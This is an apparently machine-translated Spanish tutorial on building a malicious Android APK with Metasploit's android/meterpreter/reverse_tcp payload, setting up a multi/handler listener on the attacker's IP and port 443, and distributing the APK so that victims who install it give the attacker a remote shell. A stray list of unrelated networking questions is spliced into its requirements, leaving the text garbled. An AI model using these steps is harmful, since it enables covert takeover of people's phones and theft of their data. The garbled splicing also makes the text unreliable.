Sí tu puedes . Siga los pasos a continuación …
Requisitos:
1. Metasploit framework (usamos Kali Linux 1.0.6 en este tutorial)
- Si [code] www.google.com [/ code] solo tiene una dirección IP, ¿cómo funcionan juntos los diferentes servidores?
- ¿Cambiar la dirección Mac de un dispositivo Android hará que parezca una PC con Windows para mi controlador de red? Si no es así, ¿hay alguna manera de hacer esto?
- ¿Cuál es el esquema de dirección de subred de la dirección de Clase B de 132.32.0? 0 entre tres redes de 500 nodos cada una y una red con 2000 nodos.
- ¿Hay alguna manera de hacer que su dispositivo electrónico no se pueda rastrear, como al borrar la dirección IP, o mi comprensión básica de la función de una dirección IP es incorrecta?
- Cómo averiguar si un enlace que se me envió tiene un rastreador de direcciones IP
2. Teléfono inteligente Android (utilizamos HTC One android 4.4 KitKat)
Pasos:
1. Abra la vista de terminal (CTRL + ALT + T) para ver cómo crear un atajo de teclado de Linux.
2. Utilizaremos el marco de carga útil de Metasploit para crear exploits para este tutorial.
msfpayload android / meterpreter / reverse_tcp LHOST = LPORT =
Como se describió anteriormente, la dirección IP del atacante es 192.168.8.94, a continuación se muestra nuestra captura de pantalla cuando se ejecuta el comando
3. Debido a que nuestra carga útil es reverse_tcp, donde el atacante espera que la víctima se conecte de nuevo a la máquina atacante, el atacante debe configurar el controlador para manejar las conexiones entrantes al puerto ya especificado anteriormente. Escriba msfconsole para ir a la consola Metasploit
Información:
use exploit / multi / handler -> usaremos Metasploit handler
configure la carga útil android / meterpreter / reverse_tcp -> asegúrese de que la carga útil sea la misma con el paso 2
4. El siguiente paso que necesitamos para configurar el conmutador para la carga útil de Metasploit que ya especificamos en el paso 3.
Información:
establecer lhost 192.168.8.94 -> dirección IP del atacante
configure lport 443 -> puerto para escuchar la conexión inversa
explotar -> comenzar a escuchar la conexión entrante
5. El atacante ya tiene el archivo APK y ahora comenzará a distribuirlo (no necesito describir cómo distribuir este archivo, Internet es el buen lugar para la distribución
)
6. Historias cortas de la víctima (yo mismo) descargue el archivo malicioso de APK e instálelo. Después de que la víctima abre la aplicación, la consola del atacante Metasploit obtiene algo como esto:
7. Significa que el atacante ya está dentro del teléfono inteligente Android de la víctima y que puede hacer todo con el teléfono de la víctima.
Conclusión:
No instales APK de fuentes desconocidas.
Gracias